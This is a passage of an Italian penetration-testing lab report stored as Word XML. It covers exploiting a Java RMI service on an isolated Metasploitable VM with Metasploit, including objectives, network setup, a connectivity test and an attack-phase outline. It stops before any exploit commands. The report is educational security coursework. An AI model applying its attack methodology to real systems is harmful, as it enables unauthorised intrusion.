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color w:val="1f3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SFRUTTAMENTO DI UNA VULNERABILITÀ JAVA RMI SU SISTEMA METASPLOITABLE MEDIANTE METASPLOIT FRAMEWORK</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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relazione di Laboratorio di Ethical Hacking</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sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Corso: Sicurezza Informatica / Penetration Testing</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sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipologia di attività: Esercitazione pratica di laboratorio (ambiente controllato)</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sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data di esecuzione: 24 luglio 2026</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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ambiente: Rete virtuale isolata (Oracle VirtualBox) — Kali Linux (attaccante) / Metasploitable (vittima)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pP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pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Introduzione</w:t>
      </w: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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Il presente documento espone, in forma organica e conforme agli standard di redazione tecnico-accademica, le attività svolte nell'ambito di un'esercitazione di penetration testing incentrata sullo sfruttamento di una vulnerabilità critica presente nel servizio Java RMI. L'esercizio si colloca all'interno di un percorso formativo in sicurezza informatica offensiva e ha per oggetto l'applicazione pratica delle metodologie di vulnerability assessment e exploitation mediante l'utilizzo del Metasploit Framework, strumento di riferimento nel panorama della sicurezza offensiva.</w:t>
      </w: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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La relazione ripercorre, in sequenza logica e cronologica, tutte le fasi dell'attività condotta: dalla configurazione dell'ambiente di rete virtuale, alla ricognizione attiva del bersaglio, fino allo sfruttamento della vulnerabilità e alla successiva raccolta di evidenze sul sistema compromesso. Ogni fase è corredata dalla descrizione degli strumenti e dei comandi impiegati, dagli output significativi ottenuti — documentati tramite riferimenti puntuali alle figure allegate — nonché da una disamina critica dei risultati conseguiti.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Obiettivi dell'Esercitazione</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Fonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Coerentemente con la consegna fornita, gli obiettivi dell'esercitazione sono così definiti:</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300"/>
        <w:gridCol w:w="1700"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="700"/>
            <w:gridCol w:w="7300"/>
            <w:gridCol w:w="17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1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Obiettivo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1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Stato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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Configurare correttamente l'indirizzamento IP delle macchine attaccante (192.168.11.111) e vittima (192.168.11.112)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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Conseguito</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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Individuare, tramite attività di ricognizione, il servizio vulnerabile Java RMI in ascolto sulla porta 1099</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sz w:val="20"/>
                <w:szCs w:val="20"/>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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sfruttare la vulnerabilità mediante Metasploit Framework per ottenere una sessione remota Meterpreter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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Conseguito</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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Raccogliere evidenza della configurazione di rete della macchina vittima</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sz w:val="20"/>
                <w:szCs w:val="20"/>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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Raccogliere evidenza della tabella di instradamento (routing table) della macchina vittima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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Conseguito</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ambiente di Laboratorio e Configurazione di Rete</w:t>
      </w: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rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esercitazione è stata svolta all'interno di un ambiente virtualizzato basato su Oracle VirtualBox, con due macchine virtuali collegate mediante una rete interna dedicata (host-only o internal network), al fine di garantire l'isolamento completo dell'esercitazione da reti esterne.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 Configurazione della macchina vittima (Metasploitable)</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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sulla macchina vittima è stata impostata manualmente la configurazione di rete statica, tramite modifica del file /etc/network/interfaces e assegnazione dell'indirizzo IP richiesto dalla consegna:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2"/>
        <w:tblW w:w="9645.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34">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">auto eth0</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rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">iface eth0 inet static</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rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">    address 192.168.11.112</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rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">    netmask 255.255.255.0</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
            <w:pPr>
              <w:spacing w:after="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1b1b1b"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">    gateway 192.168.11.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A seguito della configurazione, è stato eseguito un riavvio del sistema per rendere persistenti le modifiche apportate. La verifica dell'indirizzamento è stata effettuata tramite i comandi ifconfig e ip a, come illustrato in Figura 1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="3797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41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spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 Configurazione della macchina attaccante (Kali Linux)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sulla macchina Kali Linux è stata configurata un'interfaccia di rete statica dedicata, distinta da quella predisposta per l'accesso DHCP standard, tramite l'interfaccia grafica di gestione delle connessioni di rete. I parametri impostati sono i seguenti:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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50"/>
        <w:gridCol w:w="4850"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4850"/>
            <w:gridCol w:w="48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1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Parametro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1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Valore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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Indirizzo IP</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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.11.111</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f9" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="80.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="80.0" w:type="dxa"/>
              <w:right w:w="10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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Prefisso di rete (CIDR)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f9" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="80.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="80.0" w:type="dxa"/>
              <w:right w:w="10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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">/24</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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Gateway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sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.11.1</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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pStyle w:val="Heading2"/>
        <w:spacing w:after="180" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.3 Verifica della connettività</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La corretta comunicazione tra le due macchine virtuali è stata verificata mediante il comando ping, come riportato in Figura 2.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="44546a"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5760410" cy="4165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041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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esito del test di connettività (0% di packet loss, RTT medio pari a circa 1,6 ms) ha confermato la piena operatività del collegamento di rete tra le due macchine virtuali, condizione necessaria per procedere alle fasi successive dell'esercitazione.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Metodologia Operativa</w:t>
      </w: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rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attività è stata condotta secondo un approccio metodologico strutturato, allineato alle fasi standard di un penetration test di tipo black/grey-box, articolato nei seguenti macro-passaggi:</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Ricognizione (Reconnaissance): individuazione degli host attivi e dei servizi esposti sulla rete target, condotta inizialmente in assenza di conoscenza pregressa circa l'indirizzo IP della vittima.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Scansione approfondita (Service Enumeration): identificazione puntuale delle versioni software associate ai servizi individuati, al fine di correlarle a vulnerabilità note.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Ricerca e selezione dell'exploit: individuazione, tramite il database di Metasploit, del modulo più idoneo allo sfruttamento della vulnerabilità identificata.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Configurazione e lancio dell'exploit: impostazione dei parametri necessari (target, porta, payload, listener) e avvio dell'attacco controllato.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Post-Exploitation: raccolta di evidenze sul sistema compromesso, a dimostrazione dell'effettivo livello di accesso ottenuto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tale sequenza rispecchia il ciclo di vita tipico di un attacco informatico reale (cyber kill chain), riprodotto in questo caso in forma controllata a fini esclusivamente didattici.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="8496b0" w:space="4" w:sz="6" w:val="single"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="480" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:rtl w:val="0"/>
        </w:rPr>
